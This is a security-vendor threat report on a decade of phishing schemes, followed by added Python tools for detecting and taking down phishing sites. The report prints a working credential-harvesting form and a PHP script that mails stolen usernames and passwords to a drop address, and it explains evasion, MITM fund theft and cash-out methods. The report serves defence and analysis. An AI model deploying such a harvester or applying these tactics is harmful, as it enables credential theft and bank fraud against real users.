RSA FraudAction Intelligence
A DECADE OF PHISHING November 2016
TABLE OF CONTENTS
Introduction ............................................................................................................ 3
How to Set up a Phishing Campaign ........................................................................... 3
Fundamentals ....................................................................................................... 3
How Does Phishing Work in the Real World? ............................................................. 4
Motivation - How Do fraudsters Cash Out? ............................................................... 5
The Many Schemes and Techniques of Phishing ........................................................... 5
The Tax Refund Ploy - Multi-branded Phishing .......................................................... 5
Bulk Phishing Campaigns ....................................................................................... 5
Random Folder Generators ..................................................................................... 6
Local HTML Scheme .............................................................................................. 8
BASE64 encoded Phishing in a URL ......................................................................... 9
Phishing with MITM capabilities ............................................................................... 9
Phishing Plus Mobile Malware in India .................................................................... 12
Fast-Flux Phishing ............................................................................................... 15
Additional Phishing Techniques ............................................................................. 16
INTRODUCTION
Our RSA FraudAction forensic analyst looks back on a decade of phishing campaigns that we have
investigated, and also explains the techniques and inner workings of some recently seen schemes.
HOW TO SET UP A PHISHING CAMPAIGN
There is nothing complicated about setting up a phishing campaign. Phishing sites, like any
website, require a hosting facility (domain, IP address, etc.) as well as a software ‘front-end’ and
‘back-end’ (HTML, PHP, etc.). Anyone with a little knowledge of web development can set up a
phishing site without a hassle. Simple phishing sites are generally copies of legitimate
customer login pages (the front-end), where the action script (which handles the submitted
information) is different from the legitimate one. Owing to this simplicity in the preparation
process, phishing was, is, and will probably remain one of the most desirable scam techniques
performed by fraudsters.
FUNDAMENTALS
What you see in a website is usually composed in HTML (Hyper-Text Markup Language) with the
help of additional client-side scripting/markup languages such as JavaScript and CSS. These
components are responsible for presenting text, pictures, and other graphics. In addition, PHP
(Hypertext Preprocessor) scripts are normally involved to handle the exchange of data and to
perform programming tasks, and fraudsters love it! PHP is a server-side scripting language that is
relatively simple to write, and it is used by most websites today.
In every phishing site, there is an information form that victims are prompted to fill with
requested details. In HTML, forms are composed like the following example:
<form method="POST" action="getdata.php">
Username: <input type="text" name="username" /> <br/>
Password: <input type="password" name="password" /> <br/><br/>
<input type="submit" value="Login" />
</form>
The example login form above contains two data fields, Username and Password, each defined by an
input tag. The third input has a type defined as submit with a value defined as Login – this means
that it will appear on the login screen as a submit button labeled Login. The form tags at the
beginning and end of the script define a form with these fields. The form tag attributes method
and action determine how the data is going to be handled when the victim clicks the Login button –
the data will be submitted to the getdata.php handling script via an HTTP POST request.
How do fraudsters usually prepare all of the above? They copy the HTML source code of a
legitimate site’s pages, and change the action attribute to a script they’ve written (usually in
PHP). The easy method is just to take the submitted data and forward it to the fraudster’s email
address (a.k.a. the drop email). Here’s an example of a getdata.php script:
<?php
// Read the two fields submitted by the login form
$username = $_POST['username'];
$password = $_POST['password'];
// Build the message body and send it to the drop email address
$message = "-----[Best HaXoR Ever]-----\n";
$message .= "Username: $username\n";
$message .= "Password: $password\n";
$message .= "-----[Best HaXoR Ever]-----\n";
$subject = "Phished data";
mail("[email protected]", $subject, $message);
?>
Although most phishing sites still work in this simplified manner, during the last decade we’ve
seen more advanced phishing techniques develop and evolve.
HOW DOES PHISHING WORK IN THE REAL WORLD?
Being a simple way to commit fraud, phishing usually doesn’t attract sophisticated threat actors. In
some cases, they don’t even possess any programming knowledge. Phishing sites are commonly
distributed in underground forums as ‘kits’ packaged as archive files (ZIP, RAR, etc.) that contain
all the resources needed to deploy a working phishing site. Fraudsters simply configure their drop
emails in the relevant files of the kit. It is very convenient and easy for them to use. However,
distributors or kit developers don’t spend their precious time just to make their ‘clients’, the
fraudsters, happy. Many of the kits we have investigated contain hidden or obfuscated code that
forwards the stolen data back to the kit’s author as well as to the end-user fraudster. So, for
example, if 100 fraudsters use these ‘infected’ kits distributed by a single kit author, he stands to
harvest all the data stolen by 100 fraudsters, avoiding all the hard work of deploying the kit online
100 times himself.
Once a kit is developed or obtained in the underground, fraudsters need to deploy it in order to
make it available online. Here are two commonly used options for deployment:
Use a hacked website
Buy a site/domain
The first option is usually the more prevalent one. To obtain a hacked website, a fraudster either
hacks it himself, or buys it in underground forums/shops selling compromised sites. The vendor of
such a site provides the fraudster with a link to a ‘backdoor’ script (also in PHP) also known as a
shell that allows them to control and manage the site, uploading and deploying the phishing kit
resources.
When a fraudster has the phishing URL ready (deployed kit on hijacked website), he needs to
distribute it to potential victims. Distribution of phishing URLs is commonly performed via email
messages. However, occasionally fraudsters can be more creative and use additional distribution
vehicles, such as the Google advertisement platform, Facebook, Twitter, etc. Lists of email
addresses are traded and sold in underground forums, and often the price depends on how good
that list is. For example, how close a match there is between the email addresses of people from a
geographic area that matches the targeted entity, and how many of them are active or online, can
affect the price. If a fraudster is targeting a British bank, verified active email addresses owned by
British citizens will fetch a higher price.
MOTIVATION - HOW DO FRAUDSTERS CASH OUT?
Not every financial institution becomes a fraudster’s target. The main qualifying factor is either a
security flaw in the target site or the ease of cashing out or monetizing the phishing process.
For example, knowing that phishing for PII (Personally Identifiable Information) data such as
mother’s maiden name and date of birth, tied together with other personal details, can help in
transferring money from a victim’s account elsewhere will definitely draw a scammer’s attention.
Another option is fraudsters selling stolen data in the underground rather than trying to cash out
the scam by themselves. This also offers the advantage of avoiding drawing attention from law
enforcement authorities and company security departments. The buyers are usually people who
are well versed in how to cash out, and are also willing to take on the risks involved. One more
option is fraudsters collaborating with ‘money mules’. The money is transferred to a ‘mule’
account, and the money mule cashes it out for a fee. After the transfer is done, the mules go to
an ATM, withdraw the stolen money, and transfer it back to the first fraudster via a money
transfer service (Western Union, MoneyGram, etc.). Another cashout scheme is purchasing
various products online using stolen credentials, and then re-selling the items. These are just a few
examples of common cashout techniques.
THE MANY SCHEMES AND TECHNIQUES OF PHISHING
THE TAX REFUND PLOY - MULTI-BRANDED PHISHING
One phishing scam that phishers love to use is to bait victims with a supposed tax refund
notification via email, pretending to come from an official government tax/revenue service in
different countries. When victims follow the link, they see a phishing website that has the same
look and feel as the legitimate revenue service site of their country, with a list of all the banks in
that region. The victim is prompted to select their bank and enter personal information to receive
a refund. This ploy enables fraudsters to steal data from customers at several banks at once and
increase their fraud coverage.
BULK PHISHING CAMPAIGNS
Another popular trend is performing phishing campaigns in bulk form. This means that rather than
deploying a single phishing website whose URL is eventually sent to victims, fraudsters deploy them in
bulk, and distribute the URLs randomly among phishing emails. This tactic increases the phishing
sites’ lifespan and makes the detection and shutdown process a bit harder. Unlike a usual
phishing site, where the scammers use one or two hijacked websites to deploy a phishing kit, the
bulk scheme could encompass dozens of hijacked websites with several phishing directories on
each one, resulting in hundreds of phishing websites. For example:
http://examplesite1.com/pathtobulkphish/qwsd21/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/wqpwow/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/ux78nj/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/adhwe1/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/hkj3k7/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/57askv/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/loinc2/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/4jvrgr/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/mnjnde/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/hm37lj/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/oxk2hl/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/1be0lv/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/cmq8wz/phishing_site/login.html
.
.
.
http://examplesite2.com/pathtobulkphish/qwsd21/phishing_site/login.html
http://examplesite2.com/pathtobulkphish/wqpwow/phishing_site/login.html
http://examplesite2.com/pathtobulkphish/ux78nj/phishing_site/login.html
http://examplesite2.com/pathtobulkphish/adhwe1/phishing_site/login.html
http://examplesite2.com/pathtobulkphish/hkj3k7/phishing_site/login.html
.
.
.
http://examplesite3.com/pathtobulkphish/qwsd21/phishing_site/login.html
http://examplesite3.com/pathtobulkphish/wqpwow/phishing_site/login.html
http://examplesite3.com/pathtobulkphish/ux78nj/phishing_site/login.html
http://examplesite3.com/pathtobulkphish/adhwe1/phishing_site/login.html
http://examplesite3.com/pathtobulkphish/hkj3k7/phishing_site/login.html
.
.
.
Detecting one or two of these URLs and shutting them down can still leave other URLs online. The
randomly generated folder names in these phishing URLs make them much harder to detect.
Needless to say, when fraudsters host the phishing attacks on domains that they bought, it
complicates the handling of such attacks, as there is little or no cooperation from the domain
registrants in trying to shut down phishing sites. On the other hand, hijacked website registrants
are often more willing to cooperate and stop the abuse of their websites. These phishing
campaigns are often orchestrated by several threat actors.
RANDOM FOLDER GENERATORS
Some of the newer phishing kits have been observed to generate a new randomized phishing URI
for each new victim accessing the primary phishing link. The victims receive a link (by email or
another distribution method) that redirects them to a folder-generating script. Once the victim
accesses the link, a fresh (URI) folder is generated on the fly, resulting in a ‘personal’ phishing
site dedicated to this instance and this victim. The folders are usually named with a random
sequence of characters, often derived from the IP address or email address of the victim. In some cases,
the entire folder is deleted as soon as the victim finishes entering all of the requested personal
information, and the data is sent off to a phishing drop site or email address.
Here is a generic example - the initial link in the phishing email looks like this:
http://somesite.net/folder1/folder2/index.php
The PHP code in the snapshot below is an example of a random folder-generating script.
index.php is a PHP script that creates a random folder and copies all the required resource files
from the phishing kit (html, js, css, images, etc.) to a newly created folder per victim access. In
some cases, instead of a new folder, the index.php script extracts these files from a ZIP archive
sitting in the ‘base’ directory of the phishing campaign, and deploys them as is, using the name of
the archive folder.
[Code snapshot not reproduced in this text version. Its callouts mark: the random name
generating function; a step that randomizes the name some more; logging of every access to a
file, including IP, date and browser type; the file copying function; the base directory whose
contents are copied; and the final step that copies the contents to the generated folder and
redirects to it.]
[Flow diagram not reproduced. Its stages are:]
Phishing email: the victim follows a folder-generating URL.
Folder-generating script: a new randomly-named folder is generated; the required files are copied
from the base directory to the new folder; the victim is redirected to the newly generated URL.
Newly generated folder: the phishing site is presented to the victim.
This scheme is simple to operate, but it complicates detection and shutdown efforts much like the
other schemes described here. When one randomly deployed phishing URL is detected, it might be
deleted in minutes, which can mislead security personnel into thinking that the site has been
brought down. In actual fact, the site remains active and online, simply waiting for a new victim
to access the initial link. In order to handle these cases effectively, it is crucial to detect and
shut down the ‘base’ directory (or archive) that contains the initial phishing site and its resources.
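As an added example (not code from the RSA paper or from any kit it describes), here is a small Python tool for the analyst side of the bulk and random-folder schemes above. Given a list of reported URLs, it finds the path segment that varies between URLs on the same host, reduces them to one template per host, and derives the base directory above the random segment, which is the takedown target the text says matters. Hosts that share a template are most likely one campaign. The sample URL list is constructed after the pattern shown above (example hosts only); a host seen only once borrows the template learned from another host, which assumes the same kit is in use there.

```python
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample in the shape of the bulk-campaign URL list above
# (example hosts and path names only, no real sites).
SAMPLE_URLS = [
    "http://examplesite1.com/pathtobulkphish/qwsd21/phishing_site/login.html",
    "http://examplesite1.com/pathtobulkphish/wqpwow/phishing_site/login.html",
    "http://examplesite1.com/pathtobulkphish/ux78nj/phishing_site/login.html",
    "http://examplesite2.com/pathtobulkphish/qwsd21/phishing_site/login.html",
    "http://examplesite2.com/pathtobulkphish/hkj3k7/phishing_site/login.html",
    "http://examplesite3.com/pathtobulkphish/adhwe1/phishing_site/login.html",
]


def split_url(url):
    """Return (scheme, host, [path segments]); the last segment is the file."""
    p = urlparse(url)
    return p.scheme, p.netloc.lower(), [s for s in p.path.split("/") if s]


def variable_positions(segment_lists):
    """Indices at which the path segment differs between URLs of one host."""
    depth = max(len(s) for s in segment_lists)
    return [i for i in range(depth)
            if len({s[i] for s in segment_lists if len(s) > i}) > 1]


def cluster_campaign(urls):
    """Group URLs by host, mark the randomised segment with '*' and derive the
    base directory above it, which is what a takedown request should name."""
    by_host, scheme = defaultdict(list), {}
    for u in urls:
        sch, host, segs = split_url(u)
        by_host[host].append(segs)
        scheme.setdefault(host, sch)

    templates = {}
    for host, seg_lists in by_host.items():
        tmpl = list(seg_lists[0])
        for i in variable_positions(seg_lists):
            if i < len(tmpl):
                tmpl[i] = "*"
        templates[host] = tmpl

    # A host seen only once cannot reveal which segment varies, so borrow the
    # template learned from another host when every fixed segment matches
    # (assumption: the same kit was deployed on both hosts).
    learned = [t for t in templates.values() if "*" in t]
    for host, tmpl in templates.items():
        if "*" in tmpl:
            continue
        for known in learned:
            if len(known) == len(tmpl) and all(
                    k == "*" or k == s for k, s in zip(known, tmpl)):
                templates[host] = list(known)
                break

    result = {}
    for host, tmpl in templates.items():
        cut = tmpl.index("*") if "*" in tmpl else len(tmpl) - 1
        prefix = scheme[host] + "://" + host + "/"
        result[host] = {
            "count": len(by_host[host]),
            "template": prefix + "/".join(tmpl),
            "base_dir": prefix + "/".join(tmpl[:cut]) + ("/" if cut else ""),
        }
    return result


def shared_templates(clusters):
    """Path templates used by more than one host: those hosts most likely run
    the same kit as part of one bulk campaign."""
    hosts_by_template = defaultdict(list)
    for host, info in clusters.items():
        path_template = info["template"].split(host, 1)[1]
        hosts_by_template[path_template].append(host)
    return {t: h for t, h in hosts_by_template.items() if len(h) > 1}


if __name__ == "__main__":
    clusters = cluster_campaign(SAMPLE_URLS)
    for host, info in clusters.items():
        print(host, info)
    print(shared_templates(clusters))
```

The output lists one base directory per host rather than hundreds of individual URLs, which is the unit a takedown request should name for both the bulk scheme and the per-victim folder generator.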
LOCAL HTML SCHEME
The phishing scheme that is commonly called ‘Local HTML’ involves an HTML file that is attached
to an email message. Victims are prompted to open it and fill out their personal data. The
phishing site contents are placed in a single HTML file (except for the data handling script and
drop point URL that are incorporated in the form tag action attribute described earlier). The script
can be hosted by an online form-handling service, or as a PHP script hosted on a hijacked website.
In both cases, the data is usually sent to the fraudster’s drop email.
Below is a snapshot of part of a Local HTML file’s contents (the form) with a remote drop point URL.
From a cyber-security perspective, it may be difficult to shut down the site when the drop script is
hosted on a hijacked website, as it doesn’t present any abusive content when it is viewed (a blank
page is normally displayed), causing hosting facilities to think it is offline. On the other hand,
online form services are more cooperative in shutting down fraudsters’ accounts.
BASE64 ENCODED PHISHING IN A URL
Most major browsers today support a feature called the data URI scheme. This feature enables
encoding the webpage content with BASE64 encoding into a string that is seen in the browser address bar.
Fraudsters like using this encoding feature in the Local HTML phishing scheme, as well as in
regular online hosted phishing. When hosted online, it helps scammers to conceal the main
phishing URL. The data URI is injected into the address bar using JavaScript’s window.location
property or an HTML meta refresh.
The screenshot below shows the data URI as it appears in address bar.
This is an example of the script for injecting the data URI into the browser address bar.
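Added example, not code from the paper: a Python scanner for the three indicators discussed in the Fundamentals, Local HTML and BASE64 data URI sections. It parses a page (or an attached HTML file), resolves every form action against the page URL and flags actions that post to a host outside the brand’s own hosts or to a mailto: address, and it recognizes a meta-refresh or window.location redirect into a base64 data: URI, decodes the embedded page and scans it the same way. The trusted host list, page URLs and sample pages are constructed for the example.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class PageScanner(HTMLParser):
    """Collect form actions, meta-refresh targets and inline script text."""

    def __init__(self):
        super().__init__()
        self.actions, self.refresh, self.scripts = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.actions.append(a.get("action", "").strip())
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content", ""), re.I)
            if m:
                self.refresh.append(m.group(1))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


DATA_URI = re.compile(r"data:text/html(?:;charset=[\w-]+)?;base64,([A-Za-z0-9+/=]+)", re.I)


def decode_data_uris(text):
    """Decode every base64 text/html data: URI found in text."""
    pages = []
    for m in DATA_URI.finditer(text):
        try:
            pages.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError: skip malformed data
            continue
    return pages


def scan_html(html, page_url, trusted_hosts, depth=0):
    """Return (kind, detail) findings: forms whose action resolves to a host
    outside trusted_hosts (or to mailto:), and redirects into a data: URI,
    whose embedded page is scanned in turn (nesting limited to 3 levels)."""
    findings = []
    scanner = PageScanner()
    scanner.feed(html)
    scanner.close()
    for action in scanner.actions:
        target = urljoin(page_url, action) if action else page_url
        if target.lower().startswith("mailto:"):
            findings.append(("form_action_mailto", target))
        elif urlparse(target).netloc.lower() not in trusted_hosts:
            findings.append(("form_action_offsite", target))
    if depth < 3:
        for embedded in decode_data_uris("\n".join(scanner.refresh + scanner.scripts)):
            findings.append(("data_uri_redirect", f"{len(embedded)} bytes of embedded HTML"))
            findings.extend(scan_html(embedded, page_url, trusted_hosts, depth + 1))
    return findings


# Constructed samples. COPIED_FORM is the login form from the text as it would
# appear copied onto a hijacked host; LOCAL_HTML is a "Local HTML" style page
# posting to a remote drop script; REDIRECT_PAGE pushes LOCAL_HTML into the
# address bar as a base64 data: URI through window.location.
TRUSTED = {"examplebank.test"}
COPIED_FORM = """<form method="POST" action="getdata.php">
Username: <input type="text" name="username" /><br/>
Password: <input type="password" name="password" /><br/>
<input type="submit" value="Login" /></form>"""
LOCAL_HTML = """<html><body><form method="POST" action="http://drop.test/post.php">
<input type="text" name="card" /><input type="submit" value="Continue" />
</form></body></html>"""
REDIRECT_PAGE = ('<html><head><script>window.location = "data:text/html;base64,'
                 + base64.b64encode(LOCAL_HTML.encode()).decode()
                 + '";</script></head></html>')

if __name__ == "__main__":
    print(scan_html(COPIED_FORM, "http://hijacked.test/kit/login.html", TRUSTED))
    print(scan_html(REDIRECT_PAGE, "http://hijacked.test/r.php", TRUSTED))
```

The same form copied onto the brand’s own host produces no finding, while on a hijacked host its relative action resolves off-site; the redirect page yields both the data: URI finding and the off-site drop URL hidden inside it, which is the part a blank-looking landing page would otherwise conceal.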
PHISHING WITH MITM CAPABILITIES
Phishing schemes with Man-In-The-Middle (MitM) capabilities are more sophisticated than most,
and provide fraudsters with more accurate harvested credentials. Phishing with MITM means that
while the victim is interacting with a phishing site, behind the scenes and not visible to the victim,
the phishing site communicates with and performs actions on the legitimate site. This capability is
implemented with the PHP cURL module. cURL is used to transfer data through various protocols
including HTTP. To develop a script that imitates the user’s actions on a legitimate site, some
reverse engineering is required on the part of the fraudster to understand which requests and
data are forwarded to the legitimate site.
Below is a code sample illustrating the cURL object used for communicating with the legitimate
online-banking site.
The script in the snapshot below is a cURL class used for communicating with the legitimate online
banking site via an HTTP proxy (xxx.xxx.xxx.xxx:8080).
The config.php in the snapshot below contains the fraudster’s account used to receive the stolen
funds transfer.
Another part of the phishing script, seen below, uses the cURL object to transfer funds from the
victim’s account to the fraudster’s account ($cuenta_destino is defined in the config.php shown
above).
The MITM phishing scheme offers a fraudster many advantages – the fraudster can:
Login to the legitimate site to check the validity of stolen credentials
Browse the victim’s account after login to view the account balance
Grab additional personal information such as phone number, address, etc.
In addition, the MITM scheme can be used in combination with an HTTP proxy to hide the phishing
site’s original IP address and use the desired country IP to match that of the victim’s locale. This
results in a low profile in fraud monitoring system logs that flag suspicious activity if actions
carried out on the legitimate site are detected as originating from a region other than the
customer’s or the financial institution’s website locale. Moreover, there are cases where the
phishing kit checked the victim’s account balance, and when it was higher than a given amount, it
transferred the funds to a ‘mule’ account at the same bank through the legitimate site.
These kits/phishing sites are relatively rare as they require higher level coding skills and reverse
engineering of the legitimate websites.
In the best case scenario, MITM phishing only steals valid credentials. In the worst case scenario,
the funds in the account are transferred out almost instantly, making it a very serious threat in
cyber-space.
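Added example, not from the paper, of the monitoring side the text refers to. Over constructed audit events from a fictional online-banking platform, the check flags a login from a country other than the customer’s usual one and, separately, a transfer to a new beneficiary within seconds of login. The second rule is the one that still fires when the kit routes through a proxy in the victim’s country, because a script that logs in, reads the balance and pays a new payee does so far faster than a person. The log format, customer profiles and 60-second threshold are assumptions.

```python
from datetime import datetime, timedelta

# Constructed online-banking audit events, one per line:
# timestamp customer event source_ip source_country detail
SAMPLE_LOG = """\
2016-11-02T09:00:01 C1001 login 203.0.113.10 GB -
2016-11-02T09:00:03 C1001 balance 203.0.113.10 GB -
2016-11-02T09:00:05 C1001 transfer 203.0.113.10 GB beneficiary=new:ACCT-777
2016-11-02T10:15:00 C2002 login 198.51.100.7 GB -
2016-11-02T10:20:30 C2002 balance 198.51.100.7 GB -
2016-11-02T10:31:00 C2002 transfer 198.51.100.7 GB beneficiary=known:ACCT-12
2016-11-02T11:00:00 C3003 login 192.0.2.9 RO -
"""

# Constructed customer profiles: the country each customer normally banks from.
HOME_COUNTRY = {"C1001": "GB", "C2002": "GB", "C3003": "GB"}

# Assumed threshold: a person reading a balance and keying in a new payee
# takes longer than this; a scripted session does not.
MAX_LOGIN_TO_NEW_PAYEE = timedelta(seconds=60)


def parse_log(text):
    """Parse the constructed log format into event dicts."""
    events = []
    for line in text.splitlines():
        ts, cust, event, ip, country, detail = line.split(" ", 5)
        events.append({"ts": datetime.fromisoformat(ts), "customer": cust,
                       "event": event, "ip": ip, "country": country,
                       "detail": detail})
    return events


def detect_suspicious_sessions(events, home_country, max_gap=MAX_LOGIN_TO_NEW_PAYEE):
    """Return (customer, reason, timestamp) alerts.

    geo_mismatch: login from a country other than the customer's home country.
    scripted_new_payee_transfer: a transfer to a beneficiary the customer has
    never paid before, within max_gap of the login that preceded it."""
    alerts, last_login = [], {}
    for e in sorted(events, key=lambda x: x["ts"]):
        cust = e["customer"]
        if e["event"] == "login":
            last_login[cust] = e
            if e["country"] != home_country.get(cust, e["country"]):
                alerts.append((cust, "geo_mismatch", e["ts"]))
        elif e["event"] == "transfer" and e["detail"].startswith("beneficiary=new:"):
            login = last_login.get(cust)
            if login is not None and e["ts"] - login["ts"] <= max_gap:
                alerts.append((cust, "scripted_new_payee_transfer", e["ts"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_suspicious_sessions(parse_log(SAMPLE_LOG), HOME_COUNTRY):
        print(alert)
```

C1001 is caught by timing alone even though its source country matches the profile, which is exactly the situation a proxy in the victim’s country creates; C2002 pays a known beneficiary after a quarter of an hour and is left alone.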
PHISHING PLUS MOBILE MALWARE IN INDIA
Forensic analysts at RSA recently investigated a new phishing trend targeting banks in India. The
Tax Refund scheme described earlier, that operates via a spoofed government revenue service
site, was recently modified to include an SMS message sent to the victim’s phone at the end of
the phishing process. The SMS contains a link that downloads and deploys a malicious APK
(Android mobile malware archive).
This new ploy makes use of a number of schemes and techniques described earlier, including a
random folder generator, BASE64 data URI, tax-refund scheme, and more. The link provided in
the phishing emails leads victims to a redirection URL (performed via the BASE64 data URI). That
URL leads to an outer-frame site, using a script that communicates with a remote SQL database
to retrieve the inner-frame URL.
[Flow diagram not reproduced. Its stages are:]
Phishing email: the victim clicks on the redirection link.
Redirection: the victim is redirected to the outer-frame URL; the redirecting source code is
obfuscated with unescape; the redirecting code executes using a data URI.
Outer-frame: communicates with an SQL database to get the inner-frame URL; presents an
inner-frame hosted on a URL different from the outer-frame.
Inner-frame (folder generator): a randomly named folder is generated in a random parent
directory; the victim is redirected to the new folder.
Phishing site: the victim is prompted to select a bank; the victim is prompted to enter personal
data including a phone number; the compromised data is sent to a remote drop URL.
Victim receives a short-URL link via SMS: the link leads to a URL for downloading the malicious
Android application; once the APK is installed, the victim's data on the smartphone is compromised.
The snapshot below shows part of the outer-frame code – communicating with a remote SQL
database.
The inner-frame phishing URL generates a random folder in a random parent directory, which is
different from the usual folder-generators that create a new folder under the same path. The
phishing site prompts the victims to choose their bank from a long list of Indian banks to begin
the ‘tax-refund’ process. The image below shows the bank selection screen in the phishing site.
The kit uses a configuration file containing URLs for the resources needed by the phishing site:
A URL to provide all of the images needed to spoof the legitimate site, instead of grabbing
the images from the legitimate site which can trigger detection
A drop URL that receives and logs stolen data
A URL with the SMS sending script for the malicious APK
A short URL that is sent to victims
The last page file that victims see at the end of the phishing process
The code snapshot below is an example of the phishing site configuration file.
Once the victim finishes going through all the phishing pages, the folder is deleted. To add further
spice to this scheme, upon entering their phone number in this site, the victim receives an SMS
message with a link prompting the download of a malicious APK file (Android application) under
the pretense of ‘mobile verification’.
The random URL generation where links are deleted and created per victim complicates detection
and shut-down by cyber security services. The impact of this trend is beyond ‘regular’ phishing,
since at the end of the process, the victim’s phone is infected by a malicious application. That
mobile malware application keeps on stealing data from the phone long after the personal data
has been phished via a simple phishing site. Since many banks today employ two-factor
authentication using SMS messages for online banking, this malicious app can be even more
harmful – allowing the fraudster control over the phone and the second channel for
authentication.
FAST-FLUX PHISHING
One of the oldest and most sophisticated phishing schemes that RSA analysts have investigated
is commonly called Fast-Flux phishing (also known as MS-Redirect, Rock-Phish, and O-late).
These are usually phishing sites hosted on Fast-Flux networks – phishing attack domains that are
hosted at multiple IP addresses that are randomly changed over a period of minutes. Therefore, in
order to bring down these attacks, our analysts can only contact the registrars, as contacting the
ISP/hosting provider would not address the root problem. Domains are often generated automatically
in this scheme for the sole purpose of hosting phishing and malware. Each domain contained
dozens of URLs targeting several entities, making campaigns very profitable for the scam authors.
Like any kind of Fast-Flux, the infrastructure (multiple IP addresses) is based on large botnets –
many infected ‘zombie’ computers. It relies on DNS records with short TTLs in order to
achieve IP address randomization.
This scheme is not as common now as it was in the past.
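Added example, not from the paper: a Python scoring function for the fast-flux pattern the text describes, run over constructed results of polling one name’s A records every five minutes. It counts distinct addresses, the /16 prefixes they span, the lowest TTL seen and how much of each answer set is replaced by the next poll. The polling data, the second (stable) domain and the thresholds are assumptions; a real deployment would feed it resolver logs or repeated lookups, and the prefix count is IPv4-only.

```python
from ipaddress import ip_address

# Constructed results of polling one domain's A records every five minutes:
# (seconds since first poll, TTL in the answer, list of addresses).
# Addresses are from documentation ranges only.
FLUX_POLLS = [
    (0,   120, ["198.51.100.10", "203.0.113.5", "192.0.2.77"]),
    (300, 120, ["198.51.100.44", "203.0.113.91", "192.0.2.3"]),
    (600, 120, ["198.51.100.10", "203.0.113.200", "192.0.2.150"]),
]
# Constructed comparison: an ordinary name with two fixed addresses.
STABLE_POLLS = [
    (0,   3600, ["198.51.100.10", "198.51.100.11"]),
    (300, 3600, ["198.51.100.10", "198.51.100.11"]),
    (600, 3600, ["198.51.100.11", "198.51.100.10"]),
]

# Assumed thresholds; tune them against your own resolver data.
MAX_FLUX_TTL = 300
MIN_DISTINCT_IPS = 5
MIN_CHURN = 0.5


def flux_metrics(polls):
    """Summarise how many distinct addresses a name resolved to, how many
    /16 prefixes they span (IPv4 only), the lowest TTL seen and how much of
    each answer set was replaced by the next poll (churn, 0.0 to 1.0)."""
    seen, prefixes, churn = set(), set(), []
    previous = None
    for _, _, answers in polls:
        current = {str(ip_address(a)) for a in answers}  # validates each address
        seen |= current
        prefixes |= {".".join(a.split(".")[:2]) for a in current}
        if previous is not None:
            churn.append(len(previous - current) / len(previous))
        previous = current
    return {
        "distinct_ips": len(seen),
        "prefixes": len(prefixes),
        "min_ttl": min(ttl for _, ttl, _ in polls),
        "churn": sum(churn) / len(churn) if churn else 0.0,
    }


def is_fast_flux(polls):
    """Short TTL plus many addresses that keep being swapped out is the
    signature the text describes; a stable name fails on all three counts."""
    m = flux_metrics(polls)
    return (m["min_ttl"] <= MAX_FLUX_TTL
            and m["distinct_ips"] >= MIN_DISTINCT_IPS
            and m["churn"] >= MIN_CHURN)


if __name__ == "__main__":
    print("flux:", flux_metrics(FLUX_POLLS), is_fast_flux(FLUX_POLLS))
    print("stable:", flux_metrics(STABLE_POLLS), is_fast_flux(STABLE_POLLS))
```

Because the answer set lives in many unrelated networks at once, the metrics also make the text’s practical point visible: there is no single hosting provider to contact, so the registrar is the only effective takedown path.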
ADDITIONAL PHISHING TECHNIQUES
In addition to the more notable and prevalent phishing schemes we have described, there are a
few more techniques that are available in the phishing arsenal that are not as well known, but are
still out there and are worth noting.
Filtering by Geolocation and Email Address
Some phishing attacks are focused on victims with specific criteria, like geolocation. For instance,
our analysts have witnessed phishing sites that validate their victims by comparing their email
address with a long list of confirmed email addresses for a certain region that the fraudster
obtained earlier. Some phishing emails are sent with email addresses embedded in the URL’s
parameters to make sure that only the people who received the phishing email will be able to
access the fraudulent site.
[Code snapshot not reproduced. Its callouts mark the checks the script performs: make sure the
victim’s email address is set in the “id” parameter, otherwise the phishing page is not shown; check
whether the email is in the list; check whether it is a returning victim; put it in an ignore list to
prevent access a second time; if it passed the tests, redirect to the phishing page.]
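Added example, not from the paper: Python helpers for handling URLs of the kind described above, where the victim’s email address rides in a query parameter (plain or base64-encoded). The first lists such parameters, so an analyst fetching the page for verification knows to keep them (the kit will not serve the page without them); the second replaces them with a placeholder so the URL can be shared as an indicator without disclosing who was targeted. Sample URLs are constructed (example hosts and addresses).

```python
import base64
import re
from urllib.parse import parse_qsl, urlencode, urlparse, urlunparse

EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def _as_email(value):
    """Return (email, encoding) if value is an e-mail address, plain or base64;
    otherwise None."""
    if EMAIL.fullmatch(value):
        return value, "plain"
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
    except ValueError:  # not base64, bad padding, or non-ASCII bytes
        return None
    if EMAIL.fullmatch(decoded):
        return decoded, "base64"
    return None


def find_victim_identifiers(url):
    """List (parameter, email, encoding) for every query parameter that
    carries an e-mail address."""
    found = []
    for key, value in parse_qsl(urlparse(url).query, keep_blank_values=True):
        hit = _as_email(value)
        if hit:
            found.append((key, hit[0], hit[1]))
    return found


def redact_victim_identifiers(url, placeholder="REDACTED"):
    """Rebuild url with e-mail-bearing parameters replaced by placeholder.
    Keep the original for your own verification fetch; share this one."""
    parts = urlparse(url)
    query = [(k, placeholder if _as_email(v) else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunparse(parts._replace(query=urlencode(query)))


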